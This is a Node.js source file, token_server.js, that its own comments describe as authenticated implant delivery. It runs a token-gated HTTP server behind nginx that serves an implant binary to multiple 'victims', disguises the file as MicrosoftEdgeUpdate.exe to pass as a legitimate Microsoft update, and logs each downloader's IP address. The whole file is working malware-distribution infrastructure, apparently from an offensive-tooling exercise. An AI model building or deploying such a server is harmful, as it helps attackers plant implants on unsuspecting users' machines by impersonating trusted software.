/*
 * token_server.js — authenticated implant delivery (multi-use).
 *
 * Listens on localhost:3000 (nginx proxies /update/<token> here).
 * Any request carrying the correct DOWNLOAD_TOKEN receives the implant binary,
 * allowing N victims to download from the same server instance.
 *
 * DOWNLOAD_TOKEN is injected at Docker build time as an environment variable.
 * It is generated by `openssl rand -hex 32` in launch.sh (BP3 — CSPRNG).
 *
 * Timing: comparisons use a constant-time loop to prevent timing-oracle
 * attacks where an attacker could determine partial token values by measuring
 * response latency.
 */

'use strict';

const http = require('http');
const path = require('path');
const fs   = require('fs');

const TOKEN = process.env.DOWNLOAD_TOKEN;
if (!TOKEN) {
    console.error('[token_server] DOWNLOAD_TOKEN env var not set — exiting');
    process.exit(1);
}

/* Constant-time string comparison — prevents timing side-channel */
function constantTimeEqual(a, b) {
    if (a.length !== b.length) return false;
    let diff = 0;
    for (let i = 0; i < a.length; i++) {
        diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
    }
    return diff === 0;
}

/* Section 9, Problem 3: serve as MicrosoftEdgeUpdate.exe, not implant.exe */
const PAYLOAD_PATH = path.join(__dirname, 'MicrosoftEdgeUpdate.exe');

const server = http.createServer((req, res) => {
    const ts    = new Date().toISOString();
    const ip    = req.headers['x-real-ip'] || req.socket.remoteAddress;
    /* nginx strips /update/ prefix — token is the remaining path component */
    const token = req.url.replace(/^\/+/, '').split('/')[0];

    console.log(`[token_server] ${ts} ${req.method} ${req.url} from ${ip}`);

    if (!constantTimeEqual(token, TOKEN)) {
        console.log(`[token_server] ${ts} REJECTED — token mismatch (got: ${token.slice(0,8)}...)`);
        res.writeHead(404, { 'Content-Type': 'text/plain' });
        res.end('Not found');
        return;
    }

    if (!fs.existsSync(PAYLOAD_PATH)) {
        console.log(`[token_server] ${ts} ERROR — payload not found at ${PAYLOAD_PATH}`);
        res.writeHead(500, { 'Content-Type': 'text/plain' });
        res.end('Internal error');
        return;
    }

    const stat = fs.statSync(PAYLOAD_PATH);
    console.log(`[token_server] ${ts} SERVING MicrosoftEdgeUpdate.exe (${stat.size} bytes) to ${ip}`);

    res.writeHead(200, {
        'Content-Type':        'application/octet-stream',
        'Content-Disposition': 'attachment; filename="MicrosoftEdgeUpdate.exe"',
        'Content-Length':      stat.size,
        'Cache-Control':       'no-store'
    });

    fs.createReadStream(PAYLOAD_PATH).pipe(res);
});

const PORT = 3000;
server.listen(PORT, '127.0.0.1', () => {
    console.log(`[token_server] Listening on 127.0.0.1:${PORT}`);
});
